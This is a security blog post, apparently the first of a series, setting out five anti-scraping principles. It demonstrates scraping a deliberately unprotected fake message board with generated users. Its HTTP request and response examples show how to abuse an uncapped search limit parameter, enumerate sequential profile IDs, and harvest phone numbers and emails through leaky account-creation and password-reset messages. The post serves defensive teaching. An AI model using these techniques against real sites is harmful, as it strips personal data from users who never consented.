Introduction and Motivations for Scraping 

Scraping usually refers to the practice of utilizing automation to extract data from web applications. There are a multitude of motivations for scraping which range from hackers trying to amass a large amount of phone numbers and email addresses which they can sell, to law enforcement extracting pictures and user data from social media sites to assist in solving missing persons cases. Although there is a wide range of both well-intentioned and malicious reasons to scrape web applications, allowing vast amounts of user data to be extracted by third parties can result in regulatory fines, reputational damage, and harm to the individuals who had their data scraped.  

Anti-Scraping refers to the set of tactics, techniques, and procedures intended to make scraping as difficult as possible. Although completely preventing scraping is probably not possible, requiring scrapers to spend an inordinate amount of time trying to bypass an application’s protections will most likely deter the average scraper. 

Anti-Scraping Core Principles 

In our view there are 5 core principles in Anti-Scraping: 

  1. Require Authentication 
  2. Enforce Rate Limits 
  3. Lock Down Account Creation 
  4. Enforce Data Limits 
  5. Return Generic Error Messages 

These principles may look simple in theory but in practice are increasingly difficult with scale. Protecting an application on a single server with hundreds of users and a dozen endpoints is an approachable problem. However, dealing with multiple applications spread across global data centers with millions of concurrent users is an entirely different beast. Additionally, any of these principles taken too far can result in a hindrance to the user experience.  

For example, enforcing rate limits sounds great on paper but exactly how many requests should the user be able to send per minute? If it’s too strict then it can result in a normal user being unable to use the application, which may be entirely unacceptable from a business perspective. Hopefully further diving into these topics can help illuminate both what solutions organizations can try to implement and what hurdles to expect along the way. 

Fake Message Board 

In this series of blogs, a fake message board site we developed will be utilized to demonstrate the back and forth between defenders hardening their application, and scrapers bypassing those protections. All the users and data shown in the application were randomly generated. The application has typical login, account creation, and forgotten password workflows.

Screenshot of login screen on a fake message board.

Once signed into the application the user is shown 8 recommended posts. There is a search bar in the top right which can be used to find specific users.

Additionally, each user has a profile page which returns information about the user (name, email, bio, birthday, email, phone number) and their posts (date, content, comments).

No attempts were made to restrict scraping. Let’s see how complicated it is to scrape all 500,000 fake users on the platform. 

The Scraper’s Perspective 

One of a scraper’s first steps will be to proxy the traffic for the web application by using a tool like Burp Suite. The goal is to find endpoints that return or leak user data. In this case there a few different areas of the application to look at: 

  1. Recommended Posts Functionality 
  2. Search Bar 
  3. User Profile Pages 
  4. Account Creation 
  5. Forgot Password 

Recommended Posts Functionality 

The recommended posts functionality returns 8 different posts every time the home page is refreshed. As shown below, the user data is embedded in the HTML.  

Example of a recommended post for reading on a fake message board.

HTTP Request:

GET /home HTTP/1.1
Host: 127.0.0.1:12345
Cookie: session_cookie=60[TRUNCATED]

HTTP Response:

HTTP/1.0 200 OK 
[TRUNCATED] 

<div class="w3-row w3-row-padding"><div class="w3-col l3 m6 w3-margin-bottom" style="padding-bottom:30px"> 
	<img src="/images/fake_profile_pictures/158.jpg" alt="Profile Picture" style="width:100%;height:300px"> 
	<h3>Kamden Marin</h3> 
	<p class="w3-opacity">kmarin590</p> 
	<p>You'll see the rainbow bridge after it rains cats and dogs.</p>
	<p><a class="w3-button w3-light-grey w3-block" href="/81165/profile/">Profile</a></p>
	</div> 
[TRUNCATED]

As a scraper trying to figure out which endpoint to target, here are a few key questions we may ask ourselves: 

  1. Is authentication required: Yes 
  2. How much data is returned: 8 users/response 
  3. What data is returned: User ID, name, username, bio 
  4. Is the data easy to parse: Pretty easy, it’s just in the HTML 

Search Bar 

The search bar by default returns 8 users related to the provided search term. As shown below, there are multiple interesting aspects to the /search endpoint.

HTTP Request:

POST /search?limit=8 HTTP/1.1
Host: 127.0.0.1:12345
[TRUNCATED] 

{"input":"t"}

HTTP Response:

HTTP/1.0 200 OK 
[TRUNCATED] 

{ 
    "0": [ 
        "Valentin", 
        "Foster", 
        "vfoster166", 
        "7/13/1988", 
        "vfoster166@fake_yahoo.com", 
        "893183164" 
    ], 
    "4": [ 
        "Zion", 
        "Fuentes", 
        "zfuentes739", 
        "6/28/1985", 
        "zfuentes739@fake_gmail.com", 
        "905030314" 
    ],[TRUNCATED]

One of the first features to check is whether authentication is required. In this case the server still returns data even after removing the user’s session cookie. Additionally, any time there is a parameter which tells the server how much data to return that is potentially a great target for a scraper.  

What happens if we increase the limit parameter from 8 to some higher value? Is there a maximum limit? As shown in the screenshot below, changing the limit parameter to 500,000 and searching for the value “t” results in 121,069 users being returned in a single response. 

Example of adjusting the limit parameter from 8 to 500,000 to return 121,069 matches.
  1. Is authentication required: No 
  2. How much data is returned: No max limit 
  3. What data is returned: User ID, name, username, birthday, email, phone number 
  4. Is the data easy to parse: Very easy, it’s just JSON 

User Profile Pages 

Visiting a user’s profile page returns information about the user, posts they have made, and comments on those posts. 

HTTP Request:

GET /419101/profile/ HTTP/1.1
Host: 127.0.0.1:12345 
Cookie: session_cookie=60[TRUNCATED] 

HTTP Response:

HTTP/1.0 200 OK 
[TRUNCATED] 

<div class="w3-margin-bottom" style="padding-bottom:30px;width:25%"> 
	<img src="/images/fake_profile_pictures/153.jpg" alt="Profile Picture" style="width:100%;height:300px"> 
	<h3>Ashton Weeks</h3> 
	<p class="w3-opacity">aweeks950</p> 
	<p><b>BIO: </b>People keep telling me "orange" but I still prefer "pink".</p> 
	<p>Birthday: 3/25/1980</p> 
	<p>Email: aweeks950@fake_outlook.com</p> 
	<p>Phone Num: 381801397</p> 
[TRUNCATED]

Since the user IDs are sequentially generated we can just start at user ID “1” and increment up until 500,000. 

  1. Is authentication required: Yes 
  2. How much data is returned: 1 targeted user and 3 commentors per post 
  3. What data is returned: User ID, name, username, bio, birthday, email, phone num 
  4. Is the data easy to parse: Pretty easy, it’s just in the HTML 

Account Creation 

The account creation functionality requires a username, email, password, and optionally a phone number.

HTTP Request:

POST /createAccount HTTP/1.1 
Host: 127.0.0.1:12345 
[TRUNCATED] 

username=test&email=test@test.com&phone=&password=[REDACTED]

HTTP Response:

HTTP/1.0 200 OK 
[TRUNCATED] 

{"response":"success"}

The server responds with a “success” message when given a new username/email/phone. What happens if a username/email/phone number is provided that is already in use by a user? 

HTTP Request:

POST /createAccount HTTP/1.1 
Host: 127.0.0.1:12345 
[TRUNCATED] 

username=&email=&phone=893183164&password=[REDACTED]

HTTP Response:

HTTP/1.0 200 OK 
[TRUNCATED] 

{"response":"phone number taken"}

In this case an account is already using the phone number “893183164” and the server leaks that information. Although this endpoint doesn’t return user data, it still leaks information. This can be utilized by a scraper to, for example brute force all possible phone numbers and collect a list of all numbers used by users on the platform. 

Additionally, since there appears to be no protections on the account creation workflow, we can create a ton of fake accounts which can then be used for future scrapes.

Forgot Password 

The forgot password functionality requires a username and sends a recovery email/sms if the account exists.

Screenshot of forgot password screen on a fake message board.

HTTP Request Valid User:

POST /forgotPassword HTTP/1.1 
Host: 127.0.0.1:12345 
[TRUNCATED] 

username=vfoster166

HTTP Response Valid User:

HTTP/1.0 200 OK 
[TRUNCATED] 

{"success":"email sent to vfoster166@fake_yahoo.com"}

Observe that if a valid username is provided then the server returns the email address of the account. This can be utilized by scrapers to collect email addresses by either brute forcing usernames or collecting usernames from elsewhere in the application. For reference, if an invalid username is provided then the server returns an error message as shown below. 

HTTP Request Invalid User:

POST /forgotPassword HTTP/1.1 
Host: 127.0.0.1:12345 
[TRUNCATED] 

username=doesnotexist

HTTP Response Invalid User:

HTTP/1.0 200 OK 
[TRUNCATED] 

{"error":"Invalid Username"} 

Conclusion

Let’s review how the Fake Message Board application is performing with respect to our 5 core anti-scraping principles. 

  • Require Authentication 
    • The /search endpoint is accessible logged-out 
  • Enforce Rate Limits 
    • Rate limiting is nonexistent throughout the application 
  • Lock Down Account Creation 
    • There are no protections in place 
  • Enforce Data Limits 
    • The /search endpoint accepts a “limit” parameter with no maximum enforced value 
  • Return Generic Error Messages 
    • The /createAccount and /forgotPassword endpoints both leak information through error messages 

With no protections in place, scraping all 500,000 fake users of the application can be trivially done in minutes with only a few requests. In part two we’ll begin implementing anti-scraping protections into the application and examine how scrapers can adapt to those changes.